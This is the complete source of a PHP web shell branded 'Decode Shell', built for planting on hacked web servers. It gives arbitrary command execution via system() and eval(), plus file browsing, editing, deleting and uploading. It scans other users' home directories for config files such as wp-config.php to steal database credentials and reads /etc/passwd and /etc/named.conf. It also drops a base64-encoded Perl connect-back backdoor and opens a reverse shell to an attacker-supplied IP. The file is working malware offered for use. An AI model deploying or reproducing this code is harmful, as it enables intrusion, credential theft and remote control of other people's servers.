- <html>
- <body background="http://i55.tinypic.com/2ic9u6o.gif">
- <font color="#ECF8E0">
- <?php
- //_________________1700000000071
- //____________705800711___1778$$$$$01
- //________70$501________________7$$$$$$0
- //______8$$0______________________1$$$$$$$1
- //____8$47_____________1001_________$$$$$$$$1
- //___$$7______________$$$$$$________5$$$$$$$$5
- //__$$________________$$$$$$7_______5$$$$$$$$$$
- //_$$__________________8$$51________$$$$$$$$$$$$
- //0$_______________________________5$$$$$$$$$$$$$
- //$7_____________________________7$$$$$$$$$$$$$$$
- //$____________________________0$$$$$$$$$$$$$$$$$4
- //$____________________705$$$$$$$$$$$$$$$$$$$$$$$$
- //$________________0$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
- //$4_____________$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
- //0$____________$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$7
- //_$$__________$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
- //__$$________1$$$$$$$$$41__0$$$$$$$$$$$$$$$$$$$
- //___$$1______0$$$$$$$$$1____4$$$$$$$$$$$$$$$$$
- //____8$5_____1$$$$$$$$$8___74$$$$$$$$$$$$$$$5
- //_____1$$0____8$$$$$$$$40448$$$$$$$$$$$$$$$
- //_______18$57__0$$$$$$$$888$$$$$$$$$$$$$8
- //__________708870$$$$$$$$$$$$$$$$$$$$0
- //_____________771174$$$$$$$$$$$807
- //________________77110000000017
- //_____ ______ _____ ____ _____ ______
- // | __ \| ____/ ____/ __ \| __ \| ____|
- // | | | | |__ | | | | | | | | | |__
- // | | | | __|| | | | | | | | | __|
- // | |__| | |___| |___| |__| | |__| | |____
- // |_____/|______\_____\____/|_____/|______|
- // ____ __ __ ____
- // | _ \ | \/ | | _ \
- // | |_) |_ _ | \ / |_ __| |_) | ___ __ _ _ _ ___ _ _
- // | |_) | |_| | | | | | | | |_) | (_) | (_| | |_| | __| |_| |
- // |____/ \__, | |_| |_|_| |____/ \___/ \__, |\__,_|\___|\__, |
- // __/ ______ __/ | __/ |
- // |___|______| |___/ |___/
- error_reporting(0); //nos mostrara 0 reportes
- $me = basename(__FILE__); // la aplicacion decode
- $ruta = dirname(__FILE__)."/";
- if(isset($_GET['dir']))
- {
- chdir($_GET['dir']);
- }
- $array_codif = Array(
- "UTF-8",
- "ISO-8859-1",
- "ISO-8859-15"
- );
- //Por defecto
- $codificacion = "ISO-8859-1";
- $n = "noce";
- //si ubiera algo en get
- if (isset($_GET)){
- foreach($_GET as $campo=>$valor){
- switch ($campo) {
- //carpeta o archivo
- case "file": //archivo
- $ruta = htmlspecialchars($valor, ENT_QUOTES);
- if (get_magic_quotes_gpc() == 1) $ruta = stripslashes($ruta);
- break;
- case "una-codificacion":
- $codificacion = htmlspecialchars($valor, ENT_QUOTES);
- if (get_magic_quotes_gpc() == 1) $codificacion = stripslashes($codificacion);
- break;
- case "sisinfo":
- $cmd = 'set';
- echo "<fieldset > <pre>".shell_exec($cmd)."</fieldset></pre>";
- break;
- case "phpinfo":
- phpinfo();
- break;
- case "scanner":
- echo "<h2> <a href=\"?\"> <<**Regresar </a></h2>";
- echo "
- <fieldset class=\"cmd\">
- <h1>leer docuemento[read file]<h1>
- <form method=\"GET\" NAME=\"file\" action\"?\">
- <INPUT type=\"text\" name=\"file\" class=\"cmd\" size=\"30\">
- <input type=\"submit\" class=\"cmd\" name=\"enviar\">
- </fieldset></form> </h2>";
- echo ''; ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('Error: Safe_mode = On'); set_time_limit(0); @$passwd = fopen('/etc/passwd','r'); if (!$passwd) { die('[-] Error : Coudn`t Read /etc/passwd'); } $pub = array(); $users = array(); $conf = array(); $i = 0; while(!feof($passwd)) { $str = fgets($passwd); if ($i > 100) { $pos = strpos($str,':'); $username = substr($str,0,$pos); $dirz = '/home/'.$username.'/public_html/'; if (($username != '')) { if (is_readable($dirz)) { array_push($users,$username); array_push($pub,$dirz); } } } $i++; } echo '
- Scanconfig 4.0
- Created by uzanc | 2011 - Tangerang - Indonesia
- Dedicated To : www.code-security.com - www.hacker-cisadane.org
- Thank to : Yogyacarderlink - Indonesian Cyber - Hacker Newbie - Devilzc0de - Lumajangcrew And All Forum Hacker Indonesia<br><br>
- [+]=====================================[ START ]========================================[+]<br>
- '; foreach ($users as $user) { echo "\n <br>
- [+]---------------------------------- [ SCAN CONFIG ]-------------------------------------[+]<br>
- \n"; $path = "/home/$user/public_html/"; read_dir($path,$user); } echo "\n
- [+]=====================================[ FINISH ]========================================[+]<br><br>
- \n"; echo "\n [+] Scanners have been completed | Thank you been using this tools [+]<br><br><br><br>\n"; function read_dir($path,$username) { if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $fpath = "$path$file"; if (($file != '.') and ($file != '..')) { if (is_readable($fpath)) { $dr = $fpath."/"; if (is_dir($dr)) { read_dir($dr,$username); } else { if ( ($file=='config.php') or ($file=='config.inc.php') or ($file=='conf.php') or ($file=='settings.php') or ($file=='wp_config.php') or ($file=='inc.php') or ($file=='config.php') or ($file=='globals.php') or ($file=='settings.php') or ($file=='setup.php') or ($file=='dbconf.php') or ($file=='setup.php') or ($file=='common.php') or ($file=='config_global.php') or ($file=='db_connect.php') or ($file=='var.php') or ($file=='global.inc.php') or ($file=='global.php') or ($file=='config.inc') or ($file=='mysql.php') or ($file=='const.inc.php') or ($file=='dbc.php') or ($file=='dbconfig.php') or ($file=='db_settings.php') or ($file=='dbsettings.php') or ($file=='_config.php') or ($file=='db.inc.php') or ($file=='dbconnect.php') or ($file=='CHANGELOG.php') or ($file=='connect.php') or ($file=='configure.php') or ($file=='connect.php') or ($file=='config_global.php') or ($file=='configuration.php') or ($file=='db.php') or ($file=='connect.inc.php') or ($file=='dbconnect.inc.php') or ($file=='konek.php') or ($file=='koneksi.php') or ($file=='setting.php') or ($file=='wp-config.php') or ($file=='db.php') or ($file=='master.php') or ($file=='include.php') or ($file=='includes.php') or ($file=='conect.php') or ($file=='database.php') or ($file=='DB.php') or ($file=='settings.php') or ($file=='func.php') or ($file=='konfig.php') or ($file=='konfigurasi.php') or ($file=='function.php') or ($file=='functions.php') or ($file=='configure.php') or ($file=='conection.php')) { echo " [+] $fpath\n
- "; } } } } } } } echo '';
- break;
- case 'delete': //Delete a file
- if(isset($_POST['yes']))
- {
- if(unlink($_GET['file']))
- {
- print "Archivo Borrado";
- }
- else
- {
- print "NO SE PUDO BORRAR OPERACION FALLIDA O ARCHIVO NO ENCONTRADO";
- }
- }
- if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
- {
- print " <fieldset class=\"fielset1\"> <legend> Desea Eliminar</legend> ".$_GET['file']."?<br>
- <form action=\"".$me."?echo&delete&file=".$_GET['file']."\" method=POST>
- <input type=hidden name=yes value=yes>
- <center> <input type=submit value=\"Si [borrar]\"> </center></fieldset>
- ";
- }
- break;
- case 'edit': //Edit a fie
- if(isset($_POST['editform']))
- {
- $f = $_GET['file'];
- $fh = fopen($f, 'w') or print "Error al abrir archivo!";
- fwrite($fh, $_POST['editform']) or print "no se pudo fuardar el archivo!";
- fclose($fh);
- }
- print "<font color=white >";
- print "<legend> Editar Archivo </legend> <b>".$_GET['file']."</b> <br><br><form action=\"".$me."?echo&edit&file=".$_GET['file']."\" method=POST> <table border=1><td><td><fieldset ><legend>Eddicion</legend><textarea cols=90 rows=15 name=\"editform\">";
- if(file_exists($_GET['file']))
- {
- $rd = file($_GET['file']);
- foreach($rd as $l)
- {
- print htmlspecialchars($l);
- }
- }
- print "</textarea> </fieldset> <td><td></table><input type=submit value=\"Save\"></form>";
- break;
- case "echo":
- print " <script>alert('se salvo el documento correctamente')</script> <font size=\"5\"> ---------SE EDITO CORRECTAMENTE EL ARCHIVO ------</font> ";
- echo "<script>setTimeout('top.location = \'?file=\'', 1000);</script>";
- break;
- case 'rename': //renombrar
- if(isset($_POST['fileold']))
- {
- if(rename($_POST['fileold'],$_POST['filenew']))
- {
- print "Archivo Renombrado.";
- }
- else
- {
- print "NO SE PUDO RENOMBRAR EL ARCHIVO FAILED!.";
- }
- }
- if(isset($_GET['file']))
- {
- $file = basename(htmlspecialchars($_GET['file']));
- }
- else
- {
- $file = "";
- }
- print "en la carpeta ".realpath('.').".<br>
- <form action=\"".$me."?rename&dir=".realpath('.')."\" method=POST>
- <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
- <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
- <input type=submit value=\"Rename file\">
- </form>";
- break;
- case 'upload':
- if(isset($_FILES['uploadedfile']['name']))
- {
- $target_path = realpath('.').'/';
- $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
- if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
- print "File:". basename( $_FILES['uploadedfile']['name']).
- " se ha subido el archivo";
- } else{
- echo "Decode tubo problemas al subir el archivo";
- }
- }
- break;
- case 'ok':
- print " <script>alert('se salvo el documento correctamente')</script> <font size=\"5\"> ---------SE EDITO CORRECTAMENTE EL ARCHIVO ------</font> ";
- echo "<script>setTimeout('top.location = \'?file=\'', 2000);</script>";
- break;
- case 'domains':
- echo "<a href=?>REGRESAR SHELL [DECODE] </a>";
- echo "<title># Domains & Users</title>
- <style>
- font-family:Verdana,tahoma; color: white; font-size:10px; }
- A:link {text-decoration: none;color: red;}
- A:active {text-decoration: none;color: red;}
- A:visited {text-decoration: none;color: red;}
- A:hover {text-decoration: underline; color: red;}
- #new,input,table,td,tr,#gg{text-align:center;border-style:solid;text-decoration:bold;}
- tr:hover,td:hover{text-align:center;background-color: #FFFFCC; color:green;}
- </style>
- <p align=center># Domains & Users</p>
- <p align=center>Karar alShaMi t00l with PHP .. Maked By Lagripe-Dz ..?!</p><center>";
- $d0mains = @file("/etc/named.conf");
- if(!$d0mains){ die("<b># can't ReaD -> [ /etc/named.conf ]"); }
- echo "<table align=center border=1>
- <tr bgcolor=green><td>d0mains</td><td>users</td></tr>";
- foreach($d0mains as $d0main){
- if(eregi("zone",$d0main)){
- preg_match_all('#zone "(.*)"#', $d0main, $domains);
- flush();
- if(strlen(trim($domains[1][0])) > 2){
- $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
- echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>"; flush();
- }}}
- echo "</table>
- <p align='center'>
- (c)0d3d By <a href='https://www.facebook.com/ZHCtehUnstopable'>THA Disastar</a> | <a href='https://www.facebook.com/ZHCtehUnstopable'>https://www.facebook.com/ZHCtehUnstopable</a><br>
- MaDe in THA Disastar 2o11 (r)
- </p>
- ";
- break;
- case 'decode64' ;
- if (isset($_GET['decode64'])) {
- echo"<fieldset class=\"fieldset1\"> ";
- echo '<center><h2>Base64 encode/decoder</h2><br>
- <form action="" method=POST>
- <b>Encode :</b> <input type=text class=\"input\"name=code size=50><input type=submit class=\"button\" name=cod value=Encode>
- </form>
- <form action="" method=POST>
- <b>Decode :</b> <input type=text name=decode size=50><input type=submit class=\"button\" name=deco value=Decode>
- </form></center></fieldset>
- ';
- }
- if (isset($_POST['cod'])) {
- echo "<center>";
- echo "<br><br>Texto<br><br><fieldset>".$_POST['code']."</fieldset><br><br>Resultado<br><br><fieldset>";
- echo base64_encode($_POST['code']) ;
- echo "</fieldset></center><br><br>";
- }
- if (isset($_POST['deco'])) {
- echo "<center><br><br><br><br><fieldset>".$_POST['decode']." </fieldset><br><br>Result<br><br><fieldset>";
- echo base64_decode($_POST['decode']);
- echo "</fieldset></center><br><br>";
- }
- break;
- case 'exec';
- echo "
- <h1>Consola Ejecutar :</h1>
- <FORM METHOD=\"GET\" NAME=exec ACTION=\"?\">
- <INPUT TYPE=\"text\" class=\"cmd\" NAME=exec size=\"30\" >
- <INPUT TYPE=\"submit\" VALUE=\"Enviar\">
- </FORM>
- </fieldset>
- <hr>
- <pre> ";
- echo "<textarea cols=\"55\" rows=\"30\" class=\"cmd\" >";
- $var = $_GET['exec'];
- $sysm = system($var);
- echo "</textarea>";
- break;
- case 'te';
- echo " }
- <center>
- <h2> introduce codigo</h2>
- <form action=? method=\"GET\">
- <textarea value=\"te\" name=\"te\"></textarea>
- <input type=\"submit\" value = \"enviar\">
- </form>
- ";
- echo "resultado <textarea rows=\"5\" cols=\"105\">";
- if (isset($_GET['te'])) {
- $eva = eval($_GET['te']) ;
- echo "</textarea>";
- }
- break;
- case 'backdoor1';
- $gf = "/tmp/bc.pl";
- $f = fopen($gf,'w');
- $def = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCiMgUHJpdjggKiogUHJpdjggKiogUHJpdjgNCiMgSVJBTiBIQUNLRVJTIFNBQk9UQUdFIENvbm5lY3QgQmFjayBTaGVsbA0KIyBjb2RlIGJ5OkxvckQNCiMgV2UgQXJlIDpMb3JELUMwZDNyLU5ULVx4OTANCiMgRW1haWw6TG9yREBpaHN0ZWFtLmNvbQ0KIw0KI2xvcmRAU2xhY2t3YXJlTGludXg6L2hvbWUvcHJvZ3JhbWluZyQgcGVybCBkYy5wbA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0NCiMNCiNVc2FnZTogZGMucGwgW0hvc3RdIFtQb3J0XQ0KIw0KI0V4OiBkYy5wbCAxMjcuMC4wLjEgMjEyMQ0KI2xvcmRAU2xhY2t3YXJlTGludXg6L2hvbWUvcHJvZ3JhbWluZyQgcGVybCBkYy5wbCAxMjcuMC4wLjEgMjEyMQ0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0NCiMNCiNbKl0gUmVzb2x2aW5nIEhvc3ROYW1lDQojWypdIENvbm5lY3RpbmcuLi4gMTI3LjAuMC4xDQojWypdIFNwYXduaW5nIFNoZWxsDQojWypdIENvbm5lY3RlZCB0byByZW1vdGUgaG9zdA0KDQojYmFzaC0yLjA1YiMgbmMgLXZ2IC1sIC1wIDIxMjENCiNsaXN0ZW5pbmcgb24gW2FueV0gMjEyMSAuLi4NCiNjb25uZWN0IHRvIFsxMjcuMC4wLjFdIGZyb20gbG9jYWxob3N0IFsxMjcuMC4wLjFdIDMyNzY5DQojLS09PSBDb25uZWN0QmFjayBCYWNrZG9vciB2cyAxLjAgYnkgTG9yRCBvZiBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgPT0tLQ0KIw0KIy0tPT1TeXN0ZW1pbmZvPT0tLQ0KI0xpbnV4IFNsYWNrd2FyZUxpbnV4IDIuNi43ICMxIFNNUCBUaHUgRGVjIDIzIDAwOjA1OjM5IElSVCAyMDA0IGk2ODYgdW5rbm93biB1bmtub3duIEdOVS9MaW51eA0KIw0KIy0tPT1Vc2VyaW5mbz09LS0NCiN1aWQ9MTAwMShsb3JkKSBnaWQ9MTAwKHVzZXJzKSBncm91cHM9MTAwKHVzZXJzKQ0KIw0KIy0tPT1EaXJlY3Rvcnk9PS0tDQojL3Jvb3QNCiMNCiMtLT09U2hlbGw9PS0tDQojDQokc3lzdGVtID0gJy9iaW4vYmFzaCc7DQokQVJHQz1AQVJHVjsNCnByaW50ICJJSFMgQkFDSy1DT05ORUNUIEJBQ0tET09SXG5cbiI7DQppZiAoJEFSR0MhPTIpIHsNCnByaW50ICJVc2FnZTogJDAgW0hvc3RdIFtQb3J0XSBcblxuIjsNCmRpZSAiRXg6ICQwIDEyNy4wLjAuMSAyMTIxIFxuIjsNCn0NCnVzZSBTb2NrZXQ7DQp1c2UgRmlsZUhhbmRsZTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCBnZXRwcm90b2J5bmFtZSgndGNwJykpIG9yIGRpZSBwcmludCAiWy1dIFVuYWJsZSB0byBSZXNvbHZlIEhvc3RcbiI7DQpjb25uZWN0KFNPQ0tFVCwgc29ja2FkZHJfaW4oJEFSR1ZbMV0sIGluZXRfYXRvbigkQVJHVlswXSkpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gQ29ubmVjdCBIb3N0XG4iOw0KcHJpbnQgIlsqXSBSZXNvbHZpbmcgSG9zdE5hbWVcbiI7DQpwcmludCAiWypdIENvbm5lY3RpbmcuLi4gJEFSR1ZbMF0gXG4iOw0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbCBcbiI7DQpwcmludCAiWypdIENvbm5lY3RlZCB0byByZW1vdGUgaG9zdCBcbiI7DQpTT0NLRVQtPmF1dG9mbHVzaCgpOw0Kb3BlbihTVERJTiwgIj4mU09DS0VUIik7DQpvcGVuKFNURE9VVCwiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCI+JlNPQ0tFVCIpOw0KcHJpbnQgIklIUyBCQUNLLUNPTk5FQ1QgQkFDS0RPT1IgXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAtLT09U3lzdGVtaW5mbz09LS0gOyB1bmFtZSAtYTtlY2hvOw0KZWNobyAtLT09VXNlcmluZm89PS0tIDsgaWQ7ZWNobztlY2hvIC0tPT1EaXJlY3Rvcnk9PS0tIDsgcHdkO2VjaG87IGVjaG8gLS09PVNoZWxsPT0tLSAiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCiNFT0Yg
- ";
- fwrite($f, base64_decode($def));
- fclose($f);
- echo "<font size=\"5\"><a href=\"?exec=\">Ejecutar</a></font>";
- echo "EXEXCUATAR /tmp/bc.pl ip & port <br> EXAMPLE :/tmp/bc.pl 189.0.0.1 2121";
- break;
- case 'backs';
- //Connect Back -Firewall Bypass
- if (isset($_GET['backs'])){
- echo " <fieldset class=\"cmd\"> <br>Connect back Shell , bypass Firewalls<br>
- For user :<br>
- nc -l -p 1019 <br>
- <hr>
- <form method='POST' action=''><br>
- Your IP & BindPort:<br>
- <input type='text' class=\"cmd\" size='25' name='mip' >
- <input type='text' class=\"cmd\" name='bport' size='5' value='1019'><br>
- <input type='submit' value='Connect Back'>
- </fieldset></form>";
- $mip=$_POST['mip'];
- $bport=$_POST['bport'];
- if ($mip <> "")
- {
- $fp=fsockopen($mip , $bport , $errno, $errstr);
- if (!$fp){
- $result = "Error: could not open socket connection";
- }
- else {
- fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00 ready 2 USe\n*********************************************\n\n");
- while(!feof($fp)){
- fputs ($fp," bash # ");
- $result= fgets ($fp, 4096);
- $message=`$result`;
- fputs ($fp,"--> ".$message."\n");
- }
- fclose ($fp);
- }
- }
- }
- break;
- case 'mail';
- echo "
- <form method='post' name='Emailform' action='?mail&send' target='_self' onSubmit='return checkemail(this)'>
- <table border='0' cellspacing='0' cellpadding='4' width='90%' id='ContactMe'>
- <tr>
- <td width='30%'><div align='right'>Name:</div></td>
- <td width='70%'><input type='text' name='name' size='30' /></td>
- </tr>
- <tr>
- <td><div align='right'>Email:</div></td>
- <td><input type='text' name='email' size='30' /></td>
- </tr>
- <tr>
- <td><div align='right'>Website:</div></td>
- <td><input type='text' name='site' size='30' /></td>
- </tr>
- <tr>
- <td><div align='right'>Message:</div></td>
- <td><textarea name='message' cols='40' rows='4'></textarea></td>
- </tr>
- <tr>
- <td> </td>
- <td>
- <input type='submit' name='submit' value='Submit' />
- <input type='reset' name='reset' value='Reset' />
- </td>
- </tr>
- </table>
- </form>
- ";
- break;
- case 'send';
- $email = $_REQUEST['email'] ;
- $name = $_REQUEST['name'] ;
- $site = $_REQUEST['site'] ;
- $subject = "Message from: $name";
- $message = $_REQUEST['message'] ;
- $body = "From: $name \n\n Email: $email \n\n Wesbite: $site \n\n Message: $message";
- $sent = mail($to, $subject, $body, $headers) ;
- if($sent)
- {echo "MENSAJE ENVIADO";}
- else
- {echo "MENSAJE NO ENVIADO";}
- }
- }
- }
- if ($ruta == "") $ruta = dirname(__FILE__)."/";
- $presenta_nodos = "";
- $presenta_archivo = "";
- if (is_dir($ruta)){//Abrir Carpeta
- $ruta = realpath($ruta)."/";
- $presenta_nodos = explora_ruta($ruta);
- } else {// Ver Archivo
- $ruta = realpath($ruta);
- $presenta_nodos = explora_ruta(dirname($ruta)."/");
- $presenta_archivo = "<br />Contenido : ".
- $ruta."<pre>".
- explora_archivo($ruta, $codificacion).
- "</pre>";
- }
- function explora_ruta($ruta){
- $cadena = "";
- $barra = "";
- $xsf = $_GET['file'];
- $manejador = @dir($ruta);
- while ($recurso = $manejador->read()){
- $nombre = "$ruta$recurso";
- if (@is_dir($nombre)) {//ES UNA CARPETA
- //Agregamos la barra al final
- $barra = "/";
- $cadena .= "Abrir Carpeta:> ";
- $xsf = "";
- } else {//ES UN ARCHIVO
- //No agregamos barra
- $barra = "";
- $cadena .= "Abrir Op <a href=\"?delete&file=".realpath($nombre)."\"> [-D-]</a> <a href=\"?edit&file=".realpath($nombre)."\">[-E-]</a> <a href=\"?rename&file=".realpath($nombre)."\">[R]</a> ";
- $xsf = "gs";
- }
- if (@is_readable($nombre)){
- $cadena .= "<a href=\"".$_SERVER["PHP_SELF"].
- "?file=$nombre$barra\">$recurso$barra</a>";
- } else {
- $cadena .= "$recurso$barra";
- }
- $cadena .= "<br />";
- }
- $manejador->close();
- return $cadena;
- }
- function explora_archivo($ruta, $codif){
- ob_start();
- readfile($ruta);
- $contenido = ob_get_contents();
- ob_clean();
- return htmlentities($contenido, ENT_QUOTES, $codif);
- }
- //declarando datos
- $server = $_SERVER['SERVER_SOFTWARE'] ;
- $addres = $_SERVER['SERVER_ADDR'];
- $doc = $_SERVER['DOCUMENT_ROOT'] ;
- $php = $_SERVER['SERVER_ADMIN'] ;
- $uname = php_uname();
- ///sacando files
- ?>
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
- "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml" lang="es" xml:lang="es">
- <head>
- <script>
- </script>
- <script language=javascript>
- /// BARRA PRESENTACION
- var rev = "fwd";
- function titlebar(val)
- {
- var msg = "Decode Shell V.1 *Mr_BOGEY * [ ZeroxHack ]";
- var res = " ";
- var speed = 50;
- var pos = val;
- msg = " "+msg+"";
- var le = msg.length;
- if(rev == "fwd"){
- if(pos < le){
- pos = pos+1;
- scroll = msg.substr(0,pos);
- document.title = scroll;
- timer = window.setTimeout("titlebar("+pos+")",speed);
- }
- else{
- rev = "bwd";
- timer = window.setTimeout("titlebar("+pos+")",speed);
- }
- }
- else{
- if(pos > 0){
- pos = pos-1;
- var ale = le-pos;
- scrol = msg.substr(ale,le);
- document.title = scrol;
- timer = window.setTimeout("titlebar("+pos+")",speed);
- }
- else{
- rev = "fwd";
- timer = window.setTimeout("titlebar("+pos+")",speed);
- }
- }
- }
- titlebar(0);
- ///BARRA FIN
- </script>
- <meta http-equiv="X-UA-Compatible" content="IE=8" />
- ...
- <style type="text/css">
- p.one
- {
- border-style:solid;
- border-color:#0000ff;
- }
- .input {
- border: 1px solid #006;
- background: #ffc;
- }
- .button {
- border: 1px solid #006;
- background: #3ADF00;
- }
- .fieldset
- {
- color:#00f;
- background-color:#585858;
- }
- .fieldset1
- {
- color:#298A08;
- background-color:#04B404;
- }
- .tablas
- {
- color:#FF0040;
- background-color:#00FFFF;
- font-size:0.875em;
- }
- .cmd
- {
- background-color:#848484;
- }
- .textss
- body {
- font-family: “Kimberley”;
- }
- </style>
- <style type=”text/css” media=”screen”>
- @font-face {
- font-family: “Kimberley”;
- src: url(http://www.miservidor.com/fuentes/kimberle.ttf) format(“truetype”);
- }
- </style>
- </head>
- <font color="red">
- <body>
- </font><center>
- <img src="https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash3/564758_222391781222196_2001780541_n.jpg" alt height="150" width="600">
- <h1> <font color="green"> Break <font color="#FFFFFF"> Security <font color="RED"> Hackers & Mr_Boguey!!! </font></font></font></h1>
- <ul></center>
- <font size="5">
- <?php
- //server
- $spa = $espacio_disponible / 1000000000 ." GB";
- $opciones = " ";
- if (ini_get("safe_mode")){
- $opciones .= " On<br>";
- } else {
- $opciones .= " Off<br>";
- }
- echo "Safe Mode .$opciones";
- echo "<table border=\"2\" class=\"tablas\">
- <tbody>
- <tr>
- <td>Ip Addres </td>
- <td>admin </td>
- <td>root </td>
- <td>Sis Web </td>
- </tr>
- <tr>
- <td>$addres</td>
- <td>$php</td>
- <td>$doc</td>
- <td>$server<td>
- </tr>
- <tr>
- <td>Espacio Disp </td>
- <td>Safe_Mode </td>
- <td> O.s </td>
- <th>Credits</th>
- </tr>
- <tr>
- <th></th>
- <th>$opciones</th>
- <td>$uname</td>
- <th>Created By Mr_Bogey & Break Secuirty </th>
- </tr>
- </tbody>
- </table>
- ";
- ?>
- <br>
- <br>
- <br>
- <fieldset class="fieldset1"> -*-*<a href=<?php echo $me; ?>><code> inicio </a>-*-*<a href="?sisinfo">infoSistem </a>-*-* <a href="?phpinfo= "> PhpInfo </a> -*-* <code> <a href="?scanner" > Scanner Jump</a>-*-* <a href="?domains"><code>Scan Dominios </a></code>-*-* <a href="?decode64"><code>Base64</code></a>-*-* <a href="?exec"><code>[CMD]</code></a></fieldset>
- </font>
- </ul>
- <style type="text/css">
- a:link { color: yellow; }
- .especial:link { color: green; }
- </style>
- <h3>Ir Ah Carpeta</h3>
- <form action="<?php echo $_SERVER["PHP_SELF"] ?>" method="get">
- Ruta <small>(En Windows pueden usarse ambas barras "/" y "\")</small>
- <br /><br><input type="text" name="una-ruta> <br>"
- ><br><?php echo $ruta; ?> </textarea><br />
- Codificación para ver archivos por codificacion win:
- <select name="una-codificacion">
- <?php
- foreach ($array_codif as $i=>$val){
- echo "<option value=\"$val\"";
- if ($codificacion == $val) echo " selected=\"selected\"";
- echo ">$val</option>";
- }
- ?>
- </select><br />
- <input type="submit" value="enviar" />
- </form>
- <h4><br> <fieldset style="color:#00FFFF; background-color:#151515 "><?php echo "$presenta_archivo"; ?> </fieldset> </h4>
- <h2> [-D-] Delete&Borrar [-E-] Edit&Editar [-R-] Rename&Renombrar [-P-] Permissions&Permisos </h2>
- <h4><br><fieldset style="color:#00f; background-color:#151515 "> <?php echo "$presenta_nodos"; ?> </fieldset> </h4>
- </body>
- </html>
- <hr>
- <fieldset class="fieldset">
- <legend> ejecutar </legend>
- <h1><font face="Courier" size="6">Consola Ejecutar :</FONT></h1>
- <FORM METHOD="GET" NAME="consol" ACTION="?">
- <INPUT TYPE="text" class="text" NAME="cmd" size="30" >
- <INPUT TYPE="submit" class="button" VALUE="Enviar">
- </FORM>
- </fieldset>
- <hr>
- <pre>
- <?php
- $var = $_GET['cmd'];
- system($var);
- ?>
- <fieldset class="fieldset">
- <legend> Mr_Dir [crear Directorio] </legend>
- <h1><font face="Courier" size="6">Mkdir :</FONT></h1>
- <FORM METHOD="POST" NAME="make" ACTION="?">
- <INPUT TYPE="text" class="text" NAME="dirs" size="30" >
- <INPUT TYPE="submit" class="button" VALUE="Enviar">
- </FORM>
- </fieldset>
- </legend>
- <?php
- $directorio= $_POST['dirs'];
- mkdir($directorio);
- ?>
- <fieldset class="fieldset">
- <H1><font face="Courier" size="6">READ FILE</font>
- <form method="GET" NAME="file" action"?">
- <INPUT type="text" name="file" class="input" size="30">
- <input type="submit" class="button" name="enviar">
- </form>
- </fieldset>
- <fieldset class="fieldset">
- <?php
- print "</table><hr><table border=0 width=100%><td><b><h2><font color=\"withe\">Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?ok&upload=".realpath('.')."\" method=\"POST\">
- <input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
- <input type=\"submit\" class=\"button\"value=\"Upload File\" />";
- ?>
- </fieldset>
- <fieldset>
- <legend> BACKDOORS , Windows & Linux</legend>
- <br>
- <a href="?backdoor1">Windows</a>
- <br>
- <a href="?backdoor">Linux</a>
- <br>
- <a href="?backs">GENERAL</a>
- </fieldset>
Decode V2 Shell Php , Jummping Server